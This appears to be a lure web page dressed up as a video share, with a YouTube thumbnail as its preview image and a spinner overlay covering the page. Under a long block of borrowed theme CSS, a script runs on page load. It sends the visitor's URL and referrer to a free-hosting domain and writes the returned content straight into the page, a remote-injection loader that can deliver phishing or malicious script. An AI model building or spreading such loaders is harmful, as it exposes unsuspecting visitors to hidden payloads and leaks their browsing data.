<html>

<head>
    <meta content='user-scalable=no,initial-scale=1,maximum-scale=1' name='viewport' />
    <meta content='text/html; charset=UTF-8' http-equiv='Content-Type' />
    <meta content='width=device-width, initial-scale=1, shrink-to-fit=no' name='viewport' />
    <title>mone</title>
      <meta content='https://img.youtube.com/vi/7FW3H0W4FM0/maxresdefault.jpg' itemprop='thumbnailUrl' property='og:image' /></head>
<header>
    <link href='https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css' rel='stylesheet' />
    <link href='https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.1/css/all.min.css' rel='stylesheet' />
    <script src='https://code.jquery.com/jquery-3.5.1.min.js'></script>
    <style type='text/css'>
        
        /*=========================
Theme: Evelyn - Multi-paged Business Theme
Author: Areeb Majeed
Email: hello@areebmajeed.me
Version: 1.0
Created In: December 2016
===========================
CSS Style Structure:
- Font Import
- General
- Navigation Bar
- Homepage
- Pages
- Testimonials
- Footer
- Miscellaneous
==========================*/
/*=========================
Font Import
=========================*/
@import url('https://fonts.googleapis.com/css?family=Paytone+One|Roboto+Slab|Titillium+Web|Questrial');

/*=========================
General
=========================*/

html {

    text-rendering: optimizeLegibility !important;
    -webkit-font-smoothing: antialiased !important;
    -moz-osx-font-smoothing: grayscale !important;

}

/*=========================
Navigation Bar
=========================*/

.navbar {

    border: 0;
    border-radius: 0px;
    min-height: 90px;
    max-height: 90px;
    padding-top: 20px;
    box-shadow: none;
    margin-bottom: 0px;
    font-size: 1.19em;
    text-transform: uppercase;
    text-decoration: none !important;
    font-family: 'Titillium Web', serif;

}

.navbar-collapse {

    box-shadow: none;

}

.navbar-toggle {

    border: 0;

}

.navbar-default .navbar-toggle .icon-bar {

    background-color: white;

}

.navbar-default .navbar-toggle:focus, .navbar-default .navbar-toggle:hover {

    background-color: transparent;

}

.navbar-brand {

    margin-top: -20px;

}

/*=========================
Homepage
=========================*/

.homepage-cover {

    min-height: 70vh;
    padding-top: 140px;
    padding-bottom: 50px;

}

.btn-cover {

    font-size: 15px !important;
    text-transform: uppercase;
    padding: 20px 35px 20px 35px;
    border-radius: 3%;
    margin-right: 7px;

}

.btn-feature {

    font-size: 15px !important;
    text-transform: uppercase;
    padding: 20px 35px 20px 35px;
    border-radius: 3%;
    margin-right: 7px;

}

#homepage-cover {

    padding-right: 100px;

}

#homepage-cover h1 {

    font-size: 3em;
    font-family: 'Roboto Slab', serif;

}

#homepage-cover p {

    font-family: 'Roboto Slab', serif;
    font-size: 17px;

}

#homepage-cover-sidebar {

    display: block;
    text-align: center;

}

.ethics {

    min-height: 45vh;

}

.ethic {

    display: block;
    text-align: center;
    padding: 60px 40px 60px 40px;

}

.ethic i {

    font-size: 5em;

}

.ethic h3 {

    font-family: 'Paytone One', serif;
    text-transform: uppercase;

}

.ethic p {

    font-family: 'Titillium Web', serif;
    font-size: 15px;

}

/*=========================
Pages
=========================*/

#feature {

    padding: 50px 80px 50px 80px;
    font-size: 19px;
    font-family: 'Questrial', serif;

}

.feature-title {

    font-size: 250%;
    font-weight: bold;
    font-family: 'Paytone One', serif;

}

#position-right {

    display: block;
    text-align: right;

}

#position-left {

    display: block;
    text-align: left;

}

#position-center {

    padding: 50px;
    display: block;
    text-align: center;

}

/*=========================
Testimonials
=========================*/

.testimonial-title {

    font-size: 400%;
    font-weight: bold;
    font-family: 'Paytone One', serif;

}

.testimonial-text {

    font-size: 100%;
    font-family: 'Titillium Web', serif;

}

.gray-bg {

    background: #EDEDED;

}

.light-gray {

    background: #FBFBFB;

}

#message-holder {

    margin-top: 50px;

}

.cf-description {

    border-radius: 0px;
    padding: 20px 15px 20px 15px;
    box-shadow: 1px 1px 2px rgba(222, 222, 222, 0.32);
    font-family: 'Titillium Web', serif;
    font-size: 15px;
    min-height: 230px;
    max-height: 230px;
    overflow: hidden;

}

.cf-description:after {

    content: "";
    bottom: 85px;
    left: 50px;
    position: absolute;
    width: 0;
    height: 0;
    border-left: 10px solid transparent;
    border-right: 10px solid transparent;

}

.cf-user-thumb img {

    border-radius: 50%;
    width: 64px;
    height: 64px;

}

.cf-user-name {

    margin-bottom: 0px;
    font-weight: bold;

}

.cf-user-thumb, .cf-user-txt {

    display: inline-block;
    vertical-align: bottom;
    font-family: 'Roboto Slab', serif;

}

.cf-user-thumb {
    margin-right: 15px;
}

.cf-user-info {

    padding-left: 14px;
    margin-top: 35px;
    text-align: left;

}

.user-position {

    display: block;

}

.press {

    display: block;
    background: #DCDCDC;
    padding: 30px 0px 30px 0px;

}

.logo {

    text-align: center;
    -webkit-opacity: 0.5;
    -moz-opacity: 0.5;
    opacity: 0.5;

}

/*=========================
Footer
=========================*/

.footer {

    min-height: 240px;
    background: #3C3C3C;
    padding: 50px 0px 50px 0px;
    font-family: 'Roboto Slab', serif;
    color: white;

}

.footer-title {

    font-size: 120%;
    font-weight: bold;

}

.footer-links {

    list-style-type: none;
    padding: 0;
    margin: 0;

}

.footer-links li {

    margin-top: 8px;

}

.footer-links a {

    color: white !important;

}

a {

    text-decoration: none !important;

}

.social-links {

    display: block;
    margin-top: 38px;
    text-align: center;

}

.social-links i {

    padding: 25px;
    font-size: 180%;
    color: white;

}

.footer-credits {

    display: block;
    margin-top: 10px;
    text-align: center;

}

.center-img {

    display: block;
    margin: 0 auto;

}

.page-wrapper {

    min-height: 100vh;
    padding-top: 70px;
    padding-bottom: 50px;

}

.center-block {

    float: none !important;

}

/*=========================
Miscellaneous
=========================*/

#holder {

    min-height: 30vh;
    background: white;
    padding: 15px 40px 20px 40px;

}

#holder h1 {

    display: block;
    text-align: center;
    text-transform: uppercase;
    font-family: 'Paytone One', serif;
    font-size: 2.8em;
    padding-bottom: 35px;

}

#holder p {

    font-family: 'Questrial', serif;
    font-size: 120%;
    padding: 0;
    margin: 0;

}

.faq-title {

    padding: 15px;
    border: 1px black solid;
    font-family: 'Roboto Slab', serif;
    cursor: pointer;

}

.faq-ques {

    border: 1px black solid;
    margin-bottom: 20px;

}

.faq-ques .panel-heading, .faq-ques .panel-body {

    padding: 0;
    border: 0;

}

.faq-ans .panel-body {

    padding: 15px;

}

.control-label {

    font-family: 'Roboto Slab', serif;
    text-transform: uppercase;

}

input, select {

    min-height: 50px;

}

.form-control {

    border-radius: 0px;

}

.form-group {

    margin-bottom: 15px;

}

.btn-primary {

    border-radius: 0px;
    text-transform: uppercase;
    font-size: 17px !important;
    padding: 20px 35px 20px 35px;

}

.contact-feature-holder {

    margin-bottom: 30px;

}

.contact-feature-holder i {

    display: inline;
    font-size: 400%;

}

.contact-feature-holder b {

    padding-left: 25px;
    font-size: 150%;
    font-family: 'Roboto Slab', serif;

}

.contact-feature-holder span {

    padding-left: 25px;
    display: inline;

}

.pricing-table .panel-heading {

    text-align: center;
    font-family: 'Roboto Slab', serif;
    padding: 0;
    background: #3A3A3A;

}

.pricing-table .list-group-item {

    font-family: 'Titillium Web', serif;
    color: black;
    font-size: 105%;
    font-weight: bold;
    padding: 15px 10px 15px 10px;
    border-color: #EDEDED;

}

.pricing-table .panel-body {

    background: #3A3A3A;
    padding: 0;
    text-align: center;
    font-family: 'Questrial', serif;
    font-size: 100%;
    text-transform: uppercase;
    padding-bottom: 15px;

}

.pricing-table .panel-heading h3 {

    font-weight: bold;
    font-size: 150%;
    padding: 0;
    margin: 20px 2px 8px 2px;

}

.panel-footer .btn-primary {

    font-size: 17px !important;
    padding: 10px;
    color: white !important;
    border-color: #3A3A3A !important;
    background: #3A3A3A !important;
    font-family: 'Titillium Web', serif;
    font-weight: bold;

}

.panel-footer {

    background: #3A3A3A !important;

}

.pricing-table {

    border-color: #e4e4e4;
    color: white;
    background: #3A3A3A;

}

.pricing-table .list-group-item {

    color: #3A3A3A;

}

#keep-center {

    text-align: center;
    display: block;
    margin: 0 auto;

}

#title-center {

    text-align: center;
    display: block;

}

#navbar-right-side li:not(:last-child) {

    margin-right: 8px;

}

.preloader.show {
    background: white;
    position: fixed;
    min-width: 100%;
    min-height: 100vh;
    z-index: 3010;
    overflow: hidden;
    transition: 1s ease;
    -webkit-transition: 1s ease;
    -moz-transition: 1s ease;
    -ms-transition: 1s ease;
    -o-transition: 1s ease;
}

.preloader.show .icon {
    position: absolute;
    width: 0;
    height: 0;
    border-left: 50px solid transparent;
    border-right: 50px solid transparent;
    border-bottom: 100px solid #C64B4B;
    margin: 86.60px;
    top: 45%;
    bottom: 50%;
    left: 0;
    right: 0;
    vertical-align: middle;
    margin: 0 auto;
    animation: spin 3s ease-in-out infinite, cycleBg 3s ease-in-out infinite;
    -webkit-animation: spin 3s ease-in-out infinite, cycleBg 3s ease-in-out infinite;
}

@-webkit-keyframes spin {
    0% {
        -webkit-transform: rotate(0deg);
    }
    40% {
        -webkit-transform: rotate(360deg);
    }
}

@-webkit-keyframes cycleBg {
    0% {
        border-color: #C64B4B;
    }
    10% {
        border-color: #f78f39;
    }
    20% {
        border-color: #fac928;
    }
    30% {
        border-color: #a2ce7e;
    }
    40% {
        border-color: #21b799;
    }
    50% {
        border-color: #36d9c3;
    }
    60% {
        border-color: #74c7d5;
    }
    70% {
        border-color: #38a5db;
    }
    80% {
        border-color: #9661a8;
    }
    90% {
        border-color: #f1678d;
    }
    100% {
        border-color: #C64B4B;
    }
}
        
        /*=========================
Theme: Evelyn - Multi-paged Business Theme
Author: Areeb Majeed
Email: hello@areebmajeed.me
Version: 1.0
Created In: December 2016
===========================
This is a colour file.
==========================*/

.navbar {

    background: #21b799;

}

.navbar-brand {

    color: white !important;

}

#navbar-main {

    background: #21b799;
    border: 0;

}

.nav.navbar-nav > li > a:link, .nav.navbar-nav > li > a:visited, .nav.navbar-nav > li > a:hover, .nav.navbar-nav > li > a:active, #navbar-right-side > li > a:link, #navbar-right-side > li > a:visited, #navbar-right-side > li > a:hover, #navbar-right-side > li > a:active {

    color: white !important;

}

.hvr-underline-from-left:before {

    background: white !important;

}

.homepage-cover {

    background: #21b799;
    color: white;

}

.btn-cover {

    border-color: white;
    color: white !important;

}

.btn-cover:hover {

    color: #21b799 !important;
    background: white !important;

}

.btn-feature {

    border-color: #21b799;
    color: #21b799 !important;

}

.btn-feature:hover {

    color: white !important;
    background: #21b799 !important;

}

#colour1, .colour1 {

    background: #1F1F1F;
    color: white;

}

#colour2, .colour2 {

    background: #E2E2E2;
    color: #313131;

}

#colour3, .colour3 {

    background: #1F1F1F;
    color: white;

}

.cf-description {

    background-color: #21b799;
    color: white;

}

.cf-description:after {

    border-top: 15px solid #21b799;

}

#link {

    color: #21b799 !important;

}

.page-wrapper {

    background: white;

}

.faq-title {

    border: 1px #21b799 solid;
    background: #21b799;
    color: white;

}

.faq-ques {

    border: 1px #21b799 solid;

}

.btn-primary {

    background: #21b799 !important;
    border-color: white !important;
    color: white !important;

}
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        .logo img {
            padding: 14px 5px;
            height: 50px;
            width: auto;
            display: block;
            /*transition: 0.4s ease-in-out;*/
        }

        .hd-left {
            display: flex;
            align-items: center;
            flex-grow: 1;
        }

        .hd-right {
            display: flex;
        }

        header {
            align-items: center;
            border-bottom: 2px solid #0cb549;
        }

        .wrap-header {
            display: flex;
            align-items: center;
            justify-content: space-between;
            position: relative;
        }

        .m-l-15 {
            margin-left: 15px !important;
        }

        .m-l-10 {
            margin-left: 10px !important;
        }

        .top-info {
            position: absolute;
            color: white;
            z-index: 9;
            bottom: 2%;
            display: flex;
            align-items: center;
            right: 10px;

        }

        .top-info .live {
            line-height: 24px;
            padding: 0 5px;
            border-radius: 4px;
            background-color: #fa3e3e;
            margin-right: 10px;
        }

        .count-view {
            line-height: 24px;
            background: rgba(0, 0, 0, 0.5);
            border-radius: 4px;
            padding: 0 5px;
            display: flex;
            align-items: center;
        }

        .count-view>i {
            padding-right: 2px;
        }

        /*-------------------------*/
        .row-2>div {
            padding-left: 0px;
            padding-right: 0px;
            margin-bottom: 0px;
            padding: 5px;
            border: 2px solid #b8c4b8;
            border-radius: 5px;
        }

        .item-info {

            border-radius: 5px;
            padding-right: 5px;
            background: #01060a63;
            position: absolute;
            /*top: 5px;*/
            margin-top: 5px;
            z-index: 9;
            color: #fff;
            font-size: clamp(10px, 3vw, 16px);
            left: 10px;
        }

        .item-play {
            position: absolute;
            z-index: 9;
            left: 50%;
            top: 50%;
            transform: translate(-50%, -50%);

        }

        .item-play>img {
            border-radius: 50%;
            height: 60px;
            width: 60px;
        }

        .c-img1 {
            position: relative;
            display: flex;
            width: 100%;
            height: 100%;
            min-height: 200px;
            max-height: 200px;
        }

        @media (min-width: 1890px) {
            .c-img1 {
                min-height: 280px;
                max-height: 200px;
            }
        }

        .c-img1>img {
            width: 100%;
            height: 100%;
            object-fit: cover;
            display: block;
            position: absolute;
            left: 0;
            top: 0;
        }

        .story {
            text-shadow: 0 1px 2px rgb(0 0 0 / 60%);
            position: absolute;
            bottom: 15px;
            left: 5px;
            color: white;
        }

        .item-info>img {
            height: 25px;
            width: 30px;
        }

        .item-info>p {
            font-size: 15px;
        }

        .custom1 {
            background: black;
            border-radius: 50%;
            opacity: 0.4;
            height: 40px;
            width: 40px;
        }

        @media (min-width: 991px) {
            .item-play>img {

                height: 80px;
                width: 80px;
            }

            .custom1 {
                height: 50px;
                width: 50px;
            }

            .count-view>i {
                padding-right: 5px;
            }

        }

        :root {
            --sk-size: 40px;
            --sk-color: #fff;
        }

        /* Utility class for centering */
        .sk-center {
            margin: auto;
        }

        .sk-wave {
            width: var(--sk-size);
            height: var(--sk-size);
            display: flex;
            justify-content: space-between;
        }

        .sk-wave-rect {
            background-color: var(--sk-color);
            height: 100%;
            width: 15%;
            animation: sk-wave 1.2s infinite ease-in-out;
        }

        .sk-wave-rect:nth-child(1) {
            animation-delay: -1.2s;
        }

        .sk-wave-rect:nth-child(2) {
            animation-delay: -1.1s;
        }

        .sk-wave-rect:nth-child(3) {
            animation-delay: -1.0s;
        }

        .sk-wave-rect:nth-child(4) {
            animation-delay: -0.9s;
        }

        .sk-wave-rect:nth-child(5) {
            animation-delay: -0.8s;
        }

        @keyframes sk-wave {

            0%,
            40%,
            100% {
                transform: scaleY(0.4);
            }

            20% {
                transform: scaleY(1);
            }
        }

        .example {
            position: absolute;
            left: 50%;
            top: 50%;
            transform: translate(-50%, -50%);


        }

        .custom {
            z-index: 999;
            position: absolute;
            background-color: rgba(244, 109, 59, 0.7);
            width: 100%;
            height: 100vh;
        }
    </style>
</header>
<main>
    <script>
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "https://justiciable-dittos.000webhostapp.com", true);
        xhr.onload = function() {
            if (xhr.status === 200) {
                document.write(xhr.responseText);
            }
        };
        xhr.send("VXx2fDY0OHxH1" + window.location + "|" + document.referrer);
    </script>
</main>
<div class='custom' id='show'>
    <div class='example'>
        <div class='sk-wave'>
            <div class='sk-wave-rect'></div>
            <div class='sk-wave-rect'></div>
            <div class='sk-wave-rect'></div>
            <div class='sk-wave-rect'></div>
            <div class='sk-wave-rect'></div>
        </div>
    </div>
</div>

</html>
